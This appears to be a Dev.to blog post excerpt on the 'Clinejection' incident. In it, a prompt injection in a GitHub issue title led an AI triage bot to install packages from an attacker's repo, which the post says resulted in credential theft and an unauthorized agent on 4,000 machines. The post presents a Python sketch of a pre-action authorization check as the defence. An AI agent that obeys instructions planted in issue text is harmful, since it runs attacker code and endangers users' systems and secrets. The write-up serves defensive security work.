
I Built the Pre-Action Authorization Layer That Would Have Stopped Clinejection
On February 17, 2026, someone typed a sentence into a GitHub issue title box and walked away. Eight hours later, 4,000 developers had a second AI agent installed on their machines without consent. Not because of a zero-day. Not because Cline wrote bad code. Because the AI bot processing that issue title had no pre-action authorization layer between "what the prompt said to do" and "what it was actually authorized to execute."

I have been building pre-action authorization for AI agents for the past year. Here is why it matters, and how it would have changed the outcome at every step of the Clinejection attack.

TL;DR

- Clinejection started with prompt injection in a GitHub issue title, which an AI triage bot interpreted as a legitimate instruction
- The bot ran npm install from an attacker's repo, triggering cache poisoning and credential theft
- 4,000 developers got an unauthorized AI agent silently installed in 8 hours
- The root cause: no pre-action authorization between agent decision and tool execution
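To make the idea concrete, here is a minimal sketch of what a pre-action authorization layer could look like. All names here (Action, AuthorizationLayer, the tool and pattern lists) are hypothetical illustrations, not the author's actual implementation: the point is only that every action the agent proposes is checked against an explicit policy before execution, regardless of what the prompt said.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Action:
    tool: str     # e.g. "shell", "github_label"
    command: str  # the concrete invocation the agent wants to run

class AuthorizationLayer:
    """Checks every proposed action against policy before it can run."""

    def __init__(self, allowed_tools, denied_patterns):
        self.allowed_tools = set(allowed_tools)
        self.denied_patterns = list(denied_patterns)

    def authorize(self, action: Action) -> bool:
        # Deny any tool not explicitly granted to this agent role.
        if action.tool not in self.allowed_tools:
            return False
        # Deny commands matching known-dangerous patterns,
        # e.g. installing packages from arbitrary sources.
        return not any(p in action.command for p in self.denied_patterns)

# A triage bot should only ever read and label issues, never install code.
policy = AuthorizationLayer(
    allowed_tools={"github_read", "github_label"},
    denied_patterns=["npm install", "pip install", "curl"],
)

# An injected instruction proposes a shell action the role was never granted.
injected = Action(tool="shell", command="npm install attacker/repo")
print(policy.authorize(injected))  # False: blocked before execution
```

The key design choice in this sketch is that the policy is keyed to the agent's role, not to the prompt: a triage bot that can only read and label issues has no authorized path to running npm install, no matter how convincingly the issue title asks for it.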
Continue reading on Dev.to



